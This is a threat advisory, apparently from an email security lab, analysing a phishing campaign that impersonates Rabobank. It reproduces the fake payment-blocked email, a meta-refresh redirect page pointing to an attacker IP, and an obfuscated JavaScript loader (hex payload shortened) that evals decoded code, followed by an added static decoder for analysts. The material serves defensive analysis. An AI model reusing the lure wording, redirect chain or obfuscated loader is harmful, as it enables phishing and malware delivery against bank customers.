New email based threats based on obfuscated JavaScript in Rabobank emails


MX Lab, http://www.mxlab.eu, is intercepting a new email based security threat campaign that uses the obfuscated JavaScript technique, with the subject “Blokkering van de betaling door het Rabobank system”.

This campaign has the same characteristics as previous campaigns we described in the posts “Massive email based threat (phishing) campaign targets ABN Amro/Rabobank users”, “Massive email based threat targets ING users” and “Emails with subject ‘ADP Funding Notification – Debit Draft’ are a security risk”.

The email is sent from a spoofed address and informs you about a payment that is being blocked because of incorrect bank account details:

Dear client,
Rabobank hereby informs you that your payment with number 129983 has been blocked.
The cause is that the sender failed to provide the correct bank details.

Your payment order

Please enter the correct bank details of your recipient so that the payment can be executed successfully.

We apologise for the inconvenience.
Rabobank customer service

The malicious URL behind the link leads to hxxp://www.mistyorchards.co.za/information.html, and on that web page we find the following HTML code:

<meta http-equiv="refresh" content="0;url='hxxp://206.225.85.21/index.php?tp=4d446573c1e75ec4'"></meta>
<html><head><title>Even geduld aub…</title></head><body><a href="hxxp://206.225.85.21/index.php?tp=4d446573c1e75ec4">Even geduld aub…</a></body></body></html>

The web browser briefly shows a page with the message “Even geduld aub…” (“Please wait”), while the meta refresh immediately redirects to the host server 206.225.85.21. The obfuscated JavaScript code is served from that location:

<html><body><script>z=function(){e="ev";c="";
d=11;
m=Math;
for(i=32762-1;i>=0;i--){
w=i;
v=a[w];
dd=32762-i-2+1;
b=d;
dd=dd-b*m["fl"+"oo"+"r"](dd/d);
k=v*1-(dd-8);
if(x&&e)c=c+f(k);
}
md=["a"];
if(x)ev(c);}
if(z)g="362321286e71737c39262c2b2a312476646571676161
6d595d66672974746d6269644e6d5d757c29
______SHORTENED_____
a=[];

for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
f=String.fromCharCode;
try{x|=eval("pro"+"to"+"type");}catch(v){x=1;ev=eval;}
z(123);
</script></body></html>
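As an added example (not code from the MX Lab post), the following script reimplements the arithmetic of z() as a static decoder, so an analyst can recover the hidden script from the hex string g and read it instead of letting the loader eval() it. The real 32762-byte g is not reproduced; the sample hex string is constructed here from a harmless text encoded with the same scheme, and the helper names are ours.

```javascript
// Added example, not from the MX Lab post: static decoder for the scheme
// above. The loader turns the hex string g into a byte array a, then walks
// it from the last byte to the first; output character j is a[N-1-j]
// shifted by 8 - (j mod 11). Reproducing that arithmetic here recovers
// the payload text without ever calling eval().
const BLOCK = 11; // the "d=11" modulus used by the malicious script

// Same conversion the loader performs: two hex digits per byte.
function hexToBytes(g) {
  const a = [];
  for (let i = 0; i < g.length; i += 2) {
    a.push(parseInt(g.substr(i, 2), 16));
  }
  return a;
}

// Mirror of the for-loop inside z(): dd is the output index (N-1-i),
// reduced modulo 11, and the byte is shifted back by (dd-8).
function decodePayload(g) {
  const a = hexToBytes(g);
  const n = a.length;
  let c = '';
  for (let i = n - 1; i >= 0; i--) {
    let dd = n - i - 2 + 1;                    // equals n-1-i
    dd = dd - BLOCK * Math.floor(dd / BLOCK);  // dd mod 11
    c += String.fromCharCode(a[i] - (dd - 8)); // undo the per-position shift
  }
  return c;
}

// Inverse of decodePayload, used only to build the constructed sample below.
// Printable ASCII stays within one byte after the shift of -8..+2.
function encodePayload(text) {
  const n = text.length;
  const a = new Array(n);
  for (let j = 0; j < n; j++) {
    a[n - 1 - j] = text.charCodeAt(j) - 8 + (j % BLOCK);
  }
  return a.map(b => b.toString(16).padStart(2, '0')).join('');
}

// Constructed sample: a benign statement encoded exactly like the real g.
const SAMPLE_PLAINTEXT = 'document.title = "analysis sample, not the real payload";';
const SAMPLE_G = encodePayload(SAMPLE_PLAINTEXT);

// What the loader would hand to ev(c); here it is only read, not executed.
const recovered = decodePayload(SAMPLE_G);
```

Pasting the real g from a captured sample into decodePayload() yields the same text the loader would execute, which can then be inspected for the next-stage URL or dropper logic. Note that the loader's try/catch around eval("prototype") only sets x and ev when that call throws, as it does in a real browser; the static decoder does not depend on that check.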